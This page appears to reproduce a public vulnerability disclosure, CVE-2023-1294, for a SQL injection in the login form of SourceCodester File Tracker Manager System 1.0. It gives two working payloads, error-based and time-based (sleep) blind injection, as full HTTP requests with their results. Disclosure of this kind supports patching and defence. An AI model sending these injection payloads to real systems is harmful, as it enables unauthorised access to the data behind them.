Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-1294: bug_report/SQLi-1.md at main · godownio/bug_report

A vulnerability was found in SourceCodester File Tracker Manager System 1.0. It has been classified as critical. Affected is an unknown function of the file /file_manager/login.php of the component POST Parameter Handler. The manipulation of the argument username leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-222648.

CVE
#sql#vulnerability#web#windows#apple#php#auth#chrome#webkit

Permalink

Cannot retrieve contributors at this time

File Tracker Manager System v1.0 has SQL injection

BUG_Author: godownio

Website source address:https://www.sourcecodester.com/php/11510/file-tracker-manager.html

Vulnerability File: /file_manager/login.php

POST parameter ‘username’ exists SQL injection vulnerability

Payload1: username=a’&password=b

POST /file_manager/login.php HTTP/1.1
Host: 192.168.0.107
Content-Length: 22
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.107
Referer: http://192.168.0.107/file_manager/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
Connection: close

username=a'&password=b

An error occurred in the sql statement

Payload2:username=a’ and (select 1 from (select(sleep(20)))a)-- a&password=b

POST /file_manager/login.php HTTP/1.1
Host: 192.168.0.107
Content-Length: 67
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.107
Referer: http://192.168.0.107/file_manager/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
Connection: close

username=a' and (select 1 from (select(sleep(20)))a)-- a&password=b

Server response time is 20 seconds

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907